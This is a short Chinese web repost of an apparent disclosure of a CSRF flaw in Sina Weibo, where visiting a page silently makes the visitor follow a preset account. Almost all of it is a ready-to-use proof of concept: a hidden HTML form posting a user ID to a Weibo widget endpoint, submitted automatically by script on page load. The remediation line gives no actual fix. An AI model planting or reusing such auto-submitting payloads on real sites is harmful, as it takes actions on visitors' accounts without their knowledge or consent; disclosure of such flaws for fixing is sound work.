在网站框架内嵌入代码,当别人访问你的网站时,不需按关注按钮,即可自动关注你先前设定的账户。 < html > <body> <form id="imlonghao" name="imlonghao" action="http://widget.weibo.com/list/aj_attuser.php" method="post"> <input type="text" name="fuid" value="1791277461" /> </form> <script> document.imlonghao.submit(); </script> </body> </html>
修复方案: 程序员都懂的。
查看更多关于新浪微博某处CSRF自动加关注漏洞 - 网站安全 - 自的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did14632